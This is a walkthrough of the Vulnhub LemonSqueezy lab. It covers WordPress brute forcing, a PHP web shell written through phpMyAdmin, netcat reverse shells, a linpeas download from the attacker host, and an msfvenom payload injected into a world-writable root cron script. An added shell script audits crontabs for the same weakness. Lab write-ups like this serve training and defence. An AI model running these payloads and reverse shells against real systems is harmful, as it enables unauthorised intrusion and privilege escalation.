Vulnhub LemonSqueezy machine: detailed testing walkthrough

LemonSqueezy

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.1.1.1        00:50:56:c0:00:01      1      60  VMware, Inc.
 10.1.1.149      00:0c:29:8b:ab:c7      1      60  VMware, Inc.
 10.1.1.254      00:50:56:ee:66:c6      1      60  VMware, Inc.

Using Kali Linux's netdiscover tool, the target host's IP address was identified as 10.1.1.149.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.149 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-24 08:34 EST
Nmap scan report for bogon (10.1.1.149)
Host is up (0.0011s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:8B:AB:C7 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.88 seconds

The Nmap scan shows that the target host has one open port: 80 (HTTP).

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ nikto -h http://10.1.1.149
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.149
+ Target Hostname:    10.1.1.149
+ Target Port:        80
+ Start Time:         2023-02-24 08:35:50 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5a323b988acba, mtime: gzip
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7889 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-02-24 08:36:50 (GMT-5) (60 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Testing found no weak credentials on /phpmyadmin.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ gobuster dir -u http://10.1.1.149 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.149
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              sh,php,txt,html
[+] Timeout:                 10s
===============================================================
2023/02/24 08:37:49 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/wordpress            (Status: 301) [Size: 312] [--> http://10.1.1.149/wordpress/]
/manual               (Status: 301) [Size: 309] [--> http://10.1.1.149/manual/]
/javascript           (Status: 301) [Size: 313] [--> http://10.1.1.149/javascript/]
/phpmyadmin           (Status: 301) [Size: 313] [--> http://10.1.1.149/phpmyadmin/]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1097394 / 1102805 (99.51%)
===============================================================
2023/02/24 08:39:13 Finished
===============================================================

gobuster found the /wordpress directory. Visiting it in the Kali Linux browser, the status bar shows a redirect to the hostname lemonsqueezy.

Add that hostname to /etc/hosts, then refresh the page:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ sudo vim /etc/hosts
[sudo] password for kali:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ cat /etc/hosts 
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.1.1.149      lemonsqueezy

┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ wpscan --url http://lemonsqueezy/wordpress/ -e u,p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://lemonsqueezy/wordpress/ [10.1.1.149]
[+] Started: Fri Feb 24 08:55:28 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://lemonsqueezy/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://lemonsqueezy/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://lemonsqueezy/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://lemonsqueezy/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://lemonsqueezy/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
 |  - http://lemonsqueezy/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9, Match: 'Version: 1.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] lemon
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://lemonsqueezy/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Feb 24 08:55:32 2023
[+] Requests Done: 73
[+] Cached Requests: 7
[+] Data Sent: 18.24 KB
[+] Data Received: 19.996 MB
[+] Memory used: 254.246 MB
[+] Elapsed time: 00:00:03

wpscan enumerated the usernames lemon and orange. First, see whether lemon's password can be cracked.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ wpscan --url http://lemonsqueezy/wordpress/ -U lemon -P /usr/share/wordlists/rockyou.txt 
_______________________________________________________________

It ran for over 8 minutes without cracking the password.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ wpscan --url http://lemonsqueezy/wordpress/ --plugins-detection mixed
_______________________________________________________________

wpscan found no exploitable plugins, so password cracking still seems to be the way in.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ wpscan --url http://lemonsqueezy/wordpress/ -U orange -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://lemonsqueezy/wordpress/ [10.1.1.149]
[+] Started: Fri Feb 24 09:19:03 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://lemonsqueezy/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://lemonsqueezy/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://lemonsqueezy/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://lemonsqueezy/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://lemonsqueezy/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
 |  - http://lemonsqueezy/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - orange / ginger                                                                                                                                  
Trying orange / peanut Time: 00:00:01 <                                                                              > (165 / 14344557)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: orange, Password: ginger

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Feb 24 09:19:10 2023
[+] Requests Done: 338
[+] Cached Requests: 5
[+] Data Sent: 136.128 KB
[+] Data Received: 460.076 KB
[+] Memory used: 240.824 MB
[+] Elapsed time: 00:00:07

orange's password was cracked almost immediately. Logging into the WordPress backend, as expected, orange is not an administrator and there are no plugins, but under Posts there is a post that seems to contain a password: n0t1n@w0rdl1st!

Could it be the phpMyAdmin password?

That is:

Username: orange

Password: n0t1n@w0rdl1st!

Login to phpMyAdmin succeeded.

On the phpMyAdmin SQL page, enter the following statement:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"

This creates the file backdoor.php.

Visit the file:

http://10.1.1.149/wordpress/backdoor.php?cmd=whoami

Visiting this URL yields a shell:

http://10.1.1.149/wordpress/backdoor.php?cmd=nc%20-e%20/bin/bash%2010.1.1.143%205555

┌──(kali㉿kali)-[~/Desktop/Vulnhub/LemonSqueezy]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.149] 52462

www-data@lemonsqueezy:/var$ cd www
cd www
www-data@lemonsqueezy:/var/www$ ls -alh
ls -alh
total 16K
drwxr-xr-x  3 root root 4.0K Apr 26  2020 .
drwxr-xr-x 12 root root 4.0K Apr 13  2020 ..
drwxr-xr-x  3 root root 4.0K Apr 13  2020 html
-rw-r--r--  1 root root   39 Apr 26  2020 user.txt
www-data@lemonsqueezy:/var/www$ cat user.txt
cat user.txt
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH
www-data@lemonsqueezy:/var/www$ 

That gives us the user flag.

Privilege escalation

Testing showed that files could not be downloaded from Kali Linux into the /tmp directory:

www-data@lemonsqueezy:/tmp$ wget http://10.1.1.143:8000/linpeas.sh
wget http://10.1.1.143:8000/linpeas.sh
--2023-02-25 00:09:16--  http://10.1.1.143:8000/linpeas.sh
Connecting to 10.1.1.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828098 (809K) [text/x-sh]
linpeas.sh: No such file or directory

Cannot write to 'linpeas.sh' (No such file or directory).

The download has to be done from the /var/www/html/wordpress directory instead:

www-data@lemonsqueezy:/var/www/html$ cd wordpress
cd wordpress
www-data@lemonsqueezy:/var/www/html/wordpress$ wget http://10.1.1.143:8000/linpeas.sh
--2023-02-25 00:12:07--  http://10.1.1.143:8000/linpeas.sh
Connecting to 10.1.1.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828098 (809K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 808.69K  --.-KB/s    in 0.002s  

2023-02-25 00:12:08 (412 MB/s) - 'linpeas.sh' saved [828098/828098]

www-data@lemonsqueezy:/var/www/html/wordpress$ chmod +x linpeas.sh
chmod +x linpeas.sh

Note the following (from the linpeas output):

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    /etc/logrotate.d/logrotate

logrotate is run by root every two minutes.

www-data@lemonsqueezy:/var/www/html/wordpress$ ls -alh  /etc/logrotate.d/logrotate
-rwxrwxrwx 1 root root 101 Apr 26  2020 /etc/logrotate.d/logrotate
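The weakness here is a root cron job whose script is world-writable. As an added defender-side check (not part of the original walkthrough), the following POSIX shell script parses a system crontab and reports every job whose command path has the group- or other-write bit set; the function names, the constructed sample crontab in demo_audit and the temporary files are assumptions made for this example, and stat -c assumes GNU coreutils (Linux).

```shell
#!/bin/sh
# Defender-side audit for the weakness behind this privilege escalation:
# a root cron job whose command path is writable by non-root users
# (/etc/logrotate.d/logrotate was mode 777 and run by root every 2 minutes).
# Added example for this walkthrough; not part of the original post.

# Scan a system crontab (fields: min hour dom mon dow user command) and print
# "MODE<TAB>PATH<TAB>LINE" for each job whose command is an absolute path with
# the group- or other-write bit set. Exit 0 = clean, 1 = findings, 2 = unreadable.
audit_crontab() {
    crontab_file=$1
    [ -r "$crontab_file" ] || { echo "cannot read $crontab_file" >&2; return 2; }
    found=0
    while IFS= read -r line; do
        # skip blank lines, comments and NAME=value environment settings
        printf '%s\n' "$line" | grep -Eq '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*=)' && continue
        # field 7 is the first word of the command; only absolute paths are checked
        cmd=$(printf '%s\n' "$line" | awk '{ print $7 }')
        case $cmd in /*) ;; *) continue ;; esac
        [ -e "$cmd" ] || continue
        mode=$(stat -c '%a' "$cmd")             # octal permission bits (GNU stat)
        if [ $(( 0$mode & 022 )) -ne 0 ]; then  # group (020) or other (002) write bit
            printf '%s\t%s\t%s\n' "$mode" "$cmd" "$line"
            found=$(( found + 1 ))
        fi
    done < "$crontab_file"
    [ "$found" -eq 0 ]
}

# Constructed sample: a throwaway crontab modelled on the one found on the box,
# with the logrotate script created at the mode given as $1 (777 or 755).
# Returns the audit's exit status so callers can assert on it.
demo_audit() {
    dir=$(mktemp -d)
    printf 'echo rotating\n' > "$dir/logrotate"
    chmod "$1" "$dir/logrotate"
    cat > "$dir/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/2 *   * * *   root    $dir/logrotate
EOF
    audit_crontab "$dir/crontab"
    status=$?
    rm -rf "$dir"
    return "$status"
}

demo_audit 777 || echo "writable cron target found (the 777 case seen on this box)"
demo_audit 755 && echo "clean (755 case)"
```

Run audit_crontab against the real /etc/crontab (and the files under /etc/cron.d) to find the same condition on a live host.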

┌──(kali㉿kali)-[~/Desktop/Toolsets/pspy]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.1.1.143 LPORT=6666 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 92 bytes
mkfifo /tmp/byvwp; nc 10.1.1.143 6666 0</tmp/byvwp | /bin/sh >/tmp/byvwp 2>&1; rm /tmp/byvwp

www-data@lemonsqueezy:/var/www/html/wordpress$ echo 'mkfifo /tmp/byvwp; nc 10.1.1.143 6666 0</tmp/byvwp | /bin/sh >/tmp/byvwp 2>&1; rm /tmp/byvwp' > /etc/logrotate.d/logrotate
www-data@lemonsqueezy:/var/www/html/wordpress$ 

┌──(kali㉿kali)-[~/Desktop/Toolsets/pspy]
└─$ sudo nc -nlvp 6666
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.149] 38734
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=

Lessons learned

  1. For a WordPress site the usual first steps are to crack the administrator's password and then look for exploitable vulnerabilities. If neither path works, don't forget to crack the other ordinary users' passwords as well; the author may have hidden some valuable information there.

Posted 2023-02-24 23:05 by Jason_huawen